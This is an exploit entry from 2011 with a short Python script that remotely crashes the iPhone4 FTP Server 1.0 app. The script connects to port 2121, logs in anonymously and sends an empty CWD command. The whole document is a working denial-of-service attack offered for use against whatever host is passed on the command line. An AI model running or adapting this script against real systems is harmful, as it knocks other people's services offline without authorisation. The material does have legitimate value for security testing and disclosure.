iPhone4 FTP Server 1.0 – Empty CWD-RETR Remote Crash

# Exploit Title: iPhone4 FTP Server V1.0 - Empty CWD-RETR Remote Crash

# Date: 2011-05-30

# Author: offsetIntruder

# Software Link: http://itunes.apple.com/us/app/ftp-server/id356055128?mt=8

# Version: 1.0

# Tested on: iPhone4 IOS 4.3.2

# CVE: N/A

import socket

import sys

user="anonymous"

print("\n iPhone4 FTP Server By Zhang Boyang - Empty CWD-RETR Remote Crash\n")

def ExploitFTP(target):

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((target,2121))

data = s.recv(1024)

print("[+] Sending user login...")

s.send("USER " + user + '\r\n')

data = s.recv(1024)

print("[+] Sending empty CWD...\n")

s.send("CWD \r\n")

data = s.recv(1024)

s.close()

target = sys.argv[1]

ExploitFTP(target)